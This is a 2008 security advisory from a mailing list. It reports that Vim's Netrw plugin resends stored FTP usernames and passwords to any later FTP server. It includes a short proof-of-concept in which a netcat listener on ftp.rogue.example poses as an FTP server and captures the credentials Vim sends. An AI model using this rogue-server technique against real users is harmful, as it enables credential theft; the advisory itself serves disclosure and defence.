[UNIX] Vim Netrw FTP User Name and Password Disclosure
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 13 Aug 2008 08:52:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
Vim Netrw FTP User Name and Password Disclosure
"Netrw supports "transparent" editing of files on other machines using
[...] vim ftp://hostname/path/to/file" The Vim Netrw Plugin shares the FTP
user name and password across all FTP sessions. Every time Vim makes a
new FTP connection, it sends the user name and password of the previous
FTP session to the FTP server.
* Vim version 7.1.266
* Vim version 7.2
* autoload/netrw.vim version 131
* autoload/netrw.vim version 109
Once vim successfully connects to an FTP server using a user name and
password credentials, it will re-use them in all subsequent FTP sessions,
regardless of the domain name or TCP port.
This behaviour is documented, although the documentation states the
credentials are ``retained on a per-session basis''. Apparently the Vim
session, not the FTP session:
``g:netrw_uid (ftp) user-id, retained on a per-session basis
s:netrw_passwd (ftp) password, retained on a per-session basis''
-- Netrw Reference Manual (``pi_netrw.txt'')
Although FTP communication is not encrypted and therefore open to
eavesdropping, if the access to the network is protected, a
credentials-based access control is meaningful, and the credentials must
be kept secret. For example, an FTP connection to a virtual Xen instance
on the same physical machine is secure; so is an FTP session over a local
ethernet segment secured against access from untrusted parties.
No adversary action on the part of the attacker is necessary, apart from
keeping logs of the user name, password, source IP address, and other
information about the FTP session.
An example using netcat(1) for the rouge FTP server. There is another FTP
server already running on the machine:
# For the sake of this example, a custom hosts file. Note that
# ftp.secure.example and ftp.rogue.example map to different IP
$ grep '\.example' /etc/hosts
# There is a stock FTP server running already
$ netstat -plan | grep ftp
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
# Start the rogue FTP server
$ printf '220\r\n331\r\n' \
| netcat -lp 31337 ftp.rogue.example > credentials&
# We use the ex command for clarity.
$ ex ftp://ftp.secure.example/
Enter username: rdancer
Enter Password: *************
Entering Ex mode. Type "visual" to go to Normal mode.
"ftp://ftp.rogue.example:31337/" --No lines in buffer--
$ cat credentials
The information has been provided by <mailto:rdancer@xxxxxxxxxxx> Jan
The original article can be found at:
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Microsoft PowerPoint Viewer 2003 Out of Bounds Array Index Vulnerability
- Next by Date: [TOOL] SurfJack - Hijack HTTP Connections to Steal Cookies
- Previous by thread: [NT] Microsoft PowerPoint Viewer 2003 Out of Bounds Array Index Vulnerability
- Next by thread: [TOOL] SurfJack - Hijack HTTP Connections to Steal Cookies